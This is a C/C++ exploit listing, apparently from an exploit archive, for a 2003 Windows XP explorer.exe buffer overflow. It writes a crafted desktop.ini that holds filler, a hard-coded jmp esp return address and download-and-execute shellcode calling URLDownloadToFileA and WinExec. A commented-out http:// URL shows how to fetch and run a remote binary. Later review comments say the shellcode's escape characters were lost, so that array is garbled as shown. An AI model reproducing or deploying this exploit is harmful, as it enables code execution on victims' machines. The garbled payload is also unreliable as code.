
# Title : MS Windows XP (explorer.exe) Buffer Overflow Exploit
# Published : 2003-05-21
# Author : einstein


#include <stdio.h>
#include <string.h>

#include <fstream>    // standard iostreams (std::ofstream / std::ios)
#include <fstream.h>  // pre-standard header the listing was originally built with

#include <direct.h>
#include <windows.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
//
// NOTE(review): every "\x.." escape in this array has lost its backslash
// (extraction garbling). As written the lines are literal letters and digits,
// not bytes, so the blob only becomes a payload once it is re-escaped; until
// then it is just filler of the same length in characters, not in bytes.
//
// What the hex itself shows, read with the escapes restored:
//  - The immediates 0x0100003c, 0x01000004 and 0x01000000 near the middle are
//    the hard-coded image base 0x01000000 (0x3c being the e_lfanew slot of the
//    DOS header) from which the PE header and import table are walked. That is
//    the one build-specific dependency the author's note refers to: a different
//    or relocated explorer.exe breaks the import-table search.
//  - The tail holds the C strings "KERNEL32", "URLMON", "URLDownloadToFileA",
//    "WinExec" and "\~WRF5634.tmp": the download target is written to that
//    temp-file name and started with WinExec. The URL itself is not part of the
//    blob; main() appends it right after the shellcode.
  "x81xecx40x1fx00x00xe8x00x00x00x00x5dx83xedx0bxbfx61x57" 
  "x7ax74xe8x8cx00x00x00x89xbdx17x01x00x00xbfx65x1dx22x74" 
  "xe8x7cx00x00x00x89xbdx1bx01x00x00xbfx17x75x79x70xe8x6c" 
  "x00x00x00x89xbdx1fx01x00x00x8dx85x2cx01x00x00x50x2exff" 
  "x95x17x01x00x00x8dx9dx33x01x00x00x53x50x2exffx95x1bx01" 
  "x00x00x6ax00x6ax00x8dx8dx4ex01x00x00x51x8dx8dx5cx01x00" 
  "x00x51x6ax00xffxd0x8dx85x23x01x00x00x50x2exffx95x17x01" 
  "x00x00x8dx9dx46x01x00x00x53x50x2ex8bx9dx1bx01x00x00xff" 
  "xd3x6ax01x8dx8dx4ex01x00x00x51xffxd0x6ax00x2exffx95x1f" 
  "x01x00x00xbbx3cx00x00x01x8bx0bx81xc1x04x00x00x01x8dx41" 
  "x14x8bx70x68x81xc6x00x00x00x01x8bx06x83xf8x00x74x51x05" 
  "x00x00x00x01x8bx56x10x81xc2x00x00x00x01x8bx18x8bxcbx81" 
  "xe1x00x00x00x80x83xf9x00x75x2ax81xc3x00x00x00x01x83xc3" 
  "x02x33xc9x32x0bxc1xc1x08x43x80x3bx00x75xf5x3bxcfx75x04" 
  "x8bx3axebx16x83xc2x04x83xc0x04x66x83x38x00x75xc7x83xc6" 
  "x14x8bx10x83xfax00x74xa8xc3x00x00x00x00x00x00x00x00x00" 
  "x00x00x00x4bx45x52x4ex45x4cx33x32x00x55x52x4cx4dx4fx4e" 
  "x00x55x52x4cx44x6fx77x6ex6cx6fx61x64x54x6fx46x69x6cx65" 
  "x41x00x57x69x6ex45x78x65x63x00x5cx7ex57x52x46x35x36x33" 
  "x34x2ex74x6dx70x00";

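// UTF-16LE byte-order mark (FF FE). It is written first so the file is read
// as a Unicode text file; the ASCII header that follows is therefore emitted
// one byte at a time with a 0x00 high byte after each character.
// (The listing had lost the backslashes of its \x escapes; restored here.)
char unicode_header[] = "\xFF\xFE";

// Section header line, CRLF-terminated. The filler that triggers the overflow
// is written directly after it; which desktop.ini field Explorer actually
// overruns is not visible from this file.
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

// Number of filler bytes written before the saved-EBP and return-address
// slots (0xA1C = 2588). Presumably measured against the XP SP1 build the
// return address targets; other builds may need a different distance.
#define OVERFLOW_LEN 0xA1C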


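// Writes `s` as UTF-16LE without a terminator: each ASCII byte is followed by
// a 0x00 high byte, consistent with the FF FE BOM written ahead of it.
static void write_ascii_as_utf16le(std::ofstream& out, const char* s)
{
  const char high_byte = 0;
  for (; *s != '\0'; ++s) {
    out.write(s, 1);
    out.write(&high_byte, 1);
  }
}

// Writes `count` copies of `byte`.
static void write_fill(std::ofstream& out, char byte, int count)
{
  for (int i = 0; i < count; ++i) out.write(&byte, 1);
}

// Builds the exploit file: creates the folder "domain HELL team", marks it
// read-only and drops a crafted desktop.ini inside it. File layout, in order:
//   BOM (2) | "[.ShellClassInfo]\r\n" as UTF-16LE | OVERFLOW_LEN x 'B'
//   | 4 bytes saved EBP | 4 bytes return address | 12 x 'B'
//   | shellcode | NUL-terminated URL | one pad byte if the total is odd
// The trailing pad keeps the file an even number of bytes, i.e. whole
// UTF-16 code units.
//
// Returns 0 on success, 1 if the output file could not be created.
// Only the default file:// URL is benign; the commented http:// form makes
// the shellcode fetch and run a remote binary.
int main()
{
  // Payload location handed to the shellcode (URLDownloadToFileA + WinExec).
  char url[] = "file://c:/winnt/system32/calc.exe";
  // char url[] = "http://localhost/cmd.exe";

  // Return address 0x77fb59cc, stored little-endian: a "jmp esp" inside
  // ntdll.dll of Windows XP SP1. XP has no ASLR, so the fixed address works
  // there, but every other service pack / language build needs its own.
  // (The listing had lost the backslashes of its \x escapes; restored here.)
  char eip[] = "\xcc\x59\xfb\x77";

  char path[500];
  strcpy(path, "domain HELL team");
  if (mkdir(path) != 0) {
    // Not fatal: the folder may simply be left over from an earlier run.
    printf("warning: mkdir(\"%s\") failed, continuing\n", path);
  }
  // Presumably needed so Explorer honours the folder's desktop.ini at all.
  if (!SetFileAttributes(path, FILE_ATTRIBUTE_READONLY)) {
    printf("warning: could not set the read-only attribute on \"%s\"\n", path);
  }
  strcat(path, "\\desktop.ini");  // was "\desktop.ini" in the listing (lost escape)

  // Flags are combined with '|' (the original used '+', which only works
  // because the two bits never overlap).
  std::ofstream out(path, std::ios::out | std::ios::binary);
  if (!out) {
    printf("cannot create %s\n", path);
    return 1;
  }

  out.write(unicode_header, sizeof(unicode_header) - 1);
  write_ascii_as_utf16le(out, shell_header);

  write_fill(out, 'B', OVERFLOW_LEN);

  char ebp[] = "1234";  // overwrites the saved frame pointer; value is irrelevant
  out.write(ebp, 4);
  out.write(eip, 4);

  // After "jmp esp" execution presumably continues at the bytes right behind
  // the return address; 'B' (0x42) is a harmless single-byte instruction, so
  // these 12 act as a slide into the shellcode.
  write_fill(out, 'B', 12);

  out.write(shellcode, sizeof(shellcode) - 1);
  // sizeof(url) includes the NUL terminator, presumably read by the shellcode
  // as a C string.
  out.write(url, sizeof(url));

  const unsigned long len =
      (unsigned long)(sizeof(shellcode) - 1 + sizeof(url));
  printf("shellcode+url: %lu bytes\n", len);
  if (len % 2 == 1) {
    // Keep the file length even (whole UTF-16 code units).
    char pad2 = 'C';
    printf("it's odd, so add 1 extra byte\n");
    out.write(&pad2, 1);
  }

  out.close();
  return 0;
}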


